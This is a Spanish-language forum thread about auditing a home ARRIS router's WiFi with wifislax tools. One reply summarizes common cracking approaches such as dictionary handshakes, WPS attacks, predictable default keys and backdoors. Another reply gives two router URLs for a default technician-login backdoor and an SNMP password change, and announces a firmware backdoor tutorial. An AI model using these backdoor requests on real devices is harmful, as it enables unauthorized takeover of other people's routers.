|
Título: DuDA sobre fabricante Router ARRIS Publicado por: Robotgc en 24 Mayo 2015, 22:55 pm hOLA ME un saludo antes que nada, he tratado de auditar Mr propia red ARRIS he utilzado varios metodos en wifislax tanto en 4.9 como el 4.10.1 pero ni Linset ni los otros progamas me dan la clave, ultimamente he utilzado Handsaker me da el handasaker pero tengo una duda ya que del Reuter solo se que ARRIS es el fabricante pero en las opciones de Brutushack aparecen con su respectivo asterisco en verde:
orange-xxxx Tp-link-xxxxxx Wlan-xxxx-00:19:15 Technicolor ONOXXXX8netgear) LINKSSYS & D-link :-( y es en donde recae mi duda... me pueden ayudar :rolleyes: Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: Sh4k4 en 25 Mayo 2015, 08:00 am Citar he utilzado varios metodos en wifislax tanto en 4.9 como el 4.10.1 pero ni Linset ni los otros progamas me dan la clave claro que funcionan solo mete la clave en el diccionario y listo!!Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: Robotgc en 26 Mayo 2015, 18:20 pm claro que funcionan solo mete la clave en el diccionario y listo!! Exacto introduciendo la cLAVE aL diciionario se obtiene, pero quisiera experimentar y probar la vulnerabilidad de este reuter propiopor eso necesito que alguien me de alguna pista de cual opción elegir de los siguiENtes fabricantes: orange-xxxx Tp-link-xxxxxx Wlan-xxxx-00:19:15 Technicolor ONOXXXX8netgear) LINKSSYS & D-link Ya que utiZAdo Goyscript Wpa Me dice que el fabricante es ARRIS Group INC. lO MISMO ME DICE ESTA WEB QUE SE ENCARGA DE BUSCAR EL FABRICANTE MEDIANTE MAC adress http://www.coffer.com/mac_find/?string=14-cf-e2-ce-2e-10 y otros progamas como el inSSIDer no dan el fabricante ya he buscado y gooogleado sin exito >:D,simplificando, necesito el vinculo de esos 5 fabricantes con Arris.Group ya que no aperece como tal... Gracias por tu respuesta! ::) Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: engel lex en 26 Mayo 2015, 20:28 pm cual vulnerabilidad quieres experimentar?
Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: Robotgc en 27 Mayo 2015, 05:13 am cual vulnerabilidad quieres experimentar? Hola pues simplemente verificar si eSTE router Arris puede ser seguro 0% vulnerable a ataques de este tipo de utilidades como en este caso Handsaker-Brutus hack, ya que en las otras utilidades he comprobado que realmente es muy dificil obtener el pass, es con fines preventivos unicamente...sabees que opción deb0 de elegir? Gracias por tu respuesta! Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: engel lex en 27 Mayo 2015, 05:29 am basicamente todo dispositivo es seguro a fuerza bruta... por algo se llama "fuerza bruta" es literalmente probar tooooooodas las posibles opciones... si la contraseña tiene por lo menos 8 caracteres de largo, puedes olvidarlo...
muchas de estas tecnicas no son realmente necesarias probarlas, solo hay que ver como está configurado el router y en que se basa la tecnica... por eso es importante aprender en lugar de dar cabezazos... pierdes mucho menos tiempo y posiblemente llegas a mejores resultados... -si tienes contraseña wpa, olvidate de hacer fuerza bruta -el handshake solo sirve si la clave existe en un diccionario -el lindset si el usuario sabe la contraseña (no sucede siempre) y es tonto -ataques a wps solo funcionan si está activo, si no requiere presionar el boton y si no tiene protección de tiempo (en este ultimo caso no es inutil, pero requiere demasiado tiempo) -vulnerabilidades de claves puestas por proveedor, hay que revisar si la clave es predecible (o tienes muchos recursos de experiementación y sabes matematica, o averiguas en internet) -backdoor, depende del router (investigar por internet) de ahí en más hay pocas tecnicas Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: scott_ en 27 Mayo 2015, 08:46 am Pues yo le he encontrado una vulnerabilidad.
Escribe en tu url la ip de tu modem: 192.168.100:8080/login?dGVjaG5pY2lhbjo= El puerto 80 nunca nos decepciona ;D Y por ultimo 192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4; Comenta me, lo que sucedió, quiero saber si mi trabajo funciona. Saludos. Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: Hurdano en 27 Mayo 2015, 09:08 am Scott, y para que es eso?osea por curiosidad, me gustaría saber que es lo que hace la técnica que has descrito
Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: scott_ en 27 Mayo 2015, 09:42 am Scott, y para que es eso?osea por curiosidad, me gustaría saber que es lo que hace la técnica que has descrito Es un backdoor que tiene por defeco el modem. Muy pronto voy a subir un tutorial que estuve elaborando hace 1 año. De como poner una puerta trasera a un modem. Ósea en el mismo inicio de sesión pongas otro usuario. Y hasta porque no, modificar el nombre del modem por defecto. Desde un Firmware. Nunca falto en los BackDoors Engel lex ;D Saludos. Título: Re: DuDA sobre fabricante Router ARRIS Publicado por: Hurdano en 27 Mayo 2015, 11:02 am Pues sería genial Scott, sin duda un buen aporte.
Yo espero acabar pronto el libro que estoy leyendo, aunque lo malo es que no me da tiempo a desarrollar las prácticas aún, pero bueno, primero lo leo, se de que va el tema más o menos y luego una vez leido ya se moverme por el libro e ir buscando lo que necesite en cada momento. Pero me quedan aún muhooooooooos. Digo todo esto porque hasta que yo pueda aportar algo a la comunidad uff... sed pacientes xD. |